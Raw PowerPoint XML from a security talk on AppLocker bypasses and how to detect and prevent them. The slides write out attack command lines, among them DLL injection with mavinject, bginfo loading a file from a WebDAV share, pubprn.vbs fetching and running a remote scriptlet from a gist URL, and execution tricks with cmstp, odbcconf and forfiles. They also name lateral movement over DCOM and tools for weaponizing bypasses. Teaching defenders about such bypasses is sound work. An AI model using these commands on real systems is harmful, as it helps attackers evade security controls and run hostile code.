              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prevention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AppLocker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOTE – This is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mostly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> post </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2800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06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Mavinject32.exe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u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>icrosoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0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pplication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>irtualization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Part of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AppV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68468E1-C7FB-4E99-A4D9-E0E632E25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1" y="1923678"/>
            <a:ext cx="8424368" cy="223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38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Mavinject32.exe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995686"/>
            <a:ext cx="8229600" cy="2663825"/>
          </a:xfrm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Mavinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;PID&gt; /INJECTRUNNING c:\files\evil.dll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*possibly fixed in latest Windows 10 build…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56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Bginfo.exe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Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Used to set info on background picture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A9D1D85-3D6D-4C55-BE4B-C5BB00381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779346"/>
            <a:ext cx="6416655" cy="288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20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Bginfo.exe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Attackers add script files inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bgi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bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>popup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nolicprompt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Runs from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Webdav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0242" name="Picture 2" descr="https://msitpros.com/wp-content/uploads/2017/05/HardCoded.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2DB0433-F4DD-40C8-8BE9-D6B26EA5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1817"/>
            <a:ext cx="6477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4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BGInfo-Nic">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC7BA482-1FC2-4560-B26A-01623BD5C8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0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Some worth mentioning as well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5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Control.exe &lt;path to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmstp.exe /ni /s c:\cmstp\CorpVPN.inf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>odbcconf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.rsp</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>forfiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /p c:\windows\system32 /m notepad.exe /c calc.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18015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Not only Windows binaries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204A5AE9-9FB1-45C0-8DC9-1578AB579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059582"/>
            <a:ext cx="6039370" cy="354828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E296EB74-28F3-4123-8322-4A656AF19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1131590"/>
            <a:ext cx="9144000" cy="2431143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D84FEAA1-8AE9-4E4B-917D-D715FC8AA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56" y="-92546"/>
            <a:ext cx="54652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Are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>there</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of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these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binaries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2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435280" cy="2663825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="nb-NO" dirty="0">
              <a:hlinkClick r:id="rId4"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/api0cradle/UltimateAppLockerByPassList</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://gist.github.com/api0cradle/8cdc53e2a80de079709d28a2d96458c2</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://gist.github.com/trustedsec/686057a1b8cdf3e580c57b211b263abe</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://github.com/redcanaryco/atomic-red-team/tree/master/Windows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  <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/wiki/Execution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 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61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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Evolving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further</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Gen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435280" cy="3716061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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PUBPRN.vbs – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C:\Windows\System32\Printing_Admin_Scripts\en-US</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="nb-NO" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pubprn.vbs 127.0.0.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script:https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://gist.githubusercontent.com/api0cradle/fb164762143b1ff4042d9c662171a568/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/709aff66095b7f60e5d6f456a5e42021a95ca802/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test.sct</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CL_Invocation.ps1 - C:\Windows\diagnostics\system\AERO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. CL_Invocation.ps1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SyncInvoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> C:\temp\evil.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="1800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Slmgr.vbs / winrm.vbs – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Requires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registry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changes</a:t>
            </a:r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4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435280" cy="3716061"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr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DABBD52-17ED-4F67-99A6-9D39E23B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38" y="1059582"/>
            <a:ext cx="8713523" cy="1943229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A8F67E18-CC49-4BC3-A7B6-30783CEDF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46" y="1059582"/>
            <a:ext cx="7516103" cy="2016224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3E3E2D28-4A02-4A2A-8585-8B508AC96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878611"/>
            <a:ext cx="7242987" cy="31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3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3528392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Difficult to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>start hacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> someone?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1871396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435280" cy="2663825"/>
          </a:xfrm>
        </p:spPr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A0629F2-C099-47EE-9C70-567300368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340" y="0"/>
            <a:ext cx="3703320" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="https://pbs.twimg.com/media/DMWjUEEVAAAdJ1C.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{058FAE84-757E-4DD3-A8A1-EBC072DB0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97" y="1661858"/>
            <a:ext cx="8912285" cy="186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68388625-475D-4182-873A-0D0F7494708F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="2765441"/>
            <a:ext cx="5884108" cy="432048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="508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271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Legacy Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>features</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - DCOM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435280" cy="4343595"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> be used to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>perform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> lateral </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>movement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thanks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Matt Nelson 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)</a:t>
            </a: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Enourage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you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 to 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read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 his blogposts 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on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subject</a:t>
            </a:r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	https://enigma0x3.net/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0141B334-32DB-4581-9C7F-1996D0809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1590"/>
            <a:ext cx="9144000" cy="2957675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Bilde 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED0E484A-D39E-41D2-86CF-C77005606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41244"/>
            <a:ext cx="9144000" cy="6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8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Weaponizing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435280" cy="4343595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Great SCT – by Chris "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Lopi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" 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Spehn</a:t>
            </a:r>
            <a:b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@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ConsciousHacker</a:t>
            </a:r>
            <a:b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  <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/GreatSCT/GreatSCT</a:t>
            </a:r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ALBY – my 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own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 (Preview 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release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b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@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>oddvarmoe</a:t>
            </a:r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</a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/ALBY-Project/ALBY</a:t>
            </a:r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74AE3A19-3D4E-4ADB-9A63-A5F301859B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96" y="914400"/>
            <a:ext cx="3513422" cy="318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33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60040" y="1995686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Demo - ALBY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3377329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0" y="914400"/>
            <a:ext cx="8229600" cy="37160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AppLocker is your friend</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Go beyond default rules!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verify that it works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use my list of known bypasses and my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blogposts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accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/api0cradle/UltimateAppLockerByPassList</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://Oddvar.moe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400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DCOM – Use firewall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5BEE10B-EE84-4104-BD7D-1ACE8F404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925" y="699542"/>
            <a:ext cx="40290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3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6BAF4D6-BF66-4EF9-B16E-670A9046E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091" y="914400"/>
            <a:ext cx="5809817" cy="355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873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8D71CCD2-62A5-4A54-B7A0-47D1BC16D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799905"/>
            <a:ext cx="6521874" cy="2882284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A78BCB55-6504-49FE-A2BA-3A4D8803E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871960"/>
            <a:ext cx="7895346" cy="99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0371B481-69D6-403D-9770-82419336C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72" y="1584578"/>
            <a:ext cx="3438525" cy="2162175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58C00330-07CD-400B-B8F2-111D4EBC3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398" y="782572"/>
            <a:ext cx="3677602" cy="4155926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Pil: høyre 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AC447CC-2754-47D0-ADD7-060DE208AAEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3895725" y="2293810"/>
            <a:ext cx="1377696" cy="74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72903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2E22F33E-FB53-4C46-A815-81B6B5CBE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" y="1419622"/>
            <a:ext cx="5687638" cy="2316672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Bilde 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CE1504E-10B2-49D4-BD2C-F1B7C459B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958" y="1133840"/>
            <a:ext cx="3049433" cy="286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41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blocking rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example – MSBuild.exe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30851B95-C59B-4E02-B6F5-30CA59E55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1714305"/>
            <a:ext cx="9144000" cy="324301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E8B530FD-4DD1-498C-B2D9-1FCBB97AD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4" y="1714305"/>
            <a:ext cx="8044823" cy="51435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CB2840E0-9C9B-49AD-84A9-514E66207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0723" y="1566073"/>
            <a:ext cx="5490444" cy="3622690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4EA41740-FC72-42D9-8F44-67DFDD20E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5636" y="699542"/>
            <a:ext cx="6508353" cy="4160292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B8B097CA-DA5C-48D5-9B81-D66966AD24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96" y="2343292"/>
            <a:ext cx="9144000" cy="17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9544"/>
            <a:ext cx="8229600" cy="914400"/>
          </a:xfrm>
        </p:spPr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Best </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ATM!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830E291D-42B4-4FB3-8E10-D745C9E1D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957457"/>
            <a:ext cx="6444208" cy="3624867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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10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Writable paths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BD23D198-AAD6-48B4-91FA-69C0E7E23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1131590"/>
            <a:ext cx="3550070" cy="377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2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AppLockerBypass-RW-Teamviewer">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0802B858-1544-4BA7-A219-7C1E8084E1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1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Check with accesschk.exe (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sysinternals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20A78CCE-F20B-4EFF-9938-70A1E7F1A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275606"/>
            <a:ext cx="7239817" cy="290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56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PREVENTION (Make it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
